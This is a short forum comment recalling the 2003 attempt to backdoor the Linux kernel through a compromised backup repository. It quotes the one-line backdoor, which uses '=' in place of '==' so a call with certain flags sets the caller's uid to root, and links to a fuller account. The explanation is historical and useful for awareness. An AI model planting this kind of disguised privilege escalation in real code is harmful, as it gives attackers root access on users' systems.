• Hugin@lemmy.world
    link
    fedilink
    arrow-up
    2
    ·
    25 days ago

    There was at least one attempt. Back before git the linux kernel was in 1 central repo. There was also a backup repo. It was compromised with a very clever backdoor.

    The backdoor was caught but only because it didn’t have a reference to the mainline repo.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;

    Note the user uid is being set (=) to root instead of being checked(==) for root.

    The full story.

    https://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-attempt-of-2003/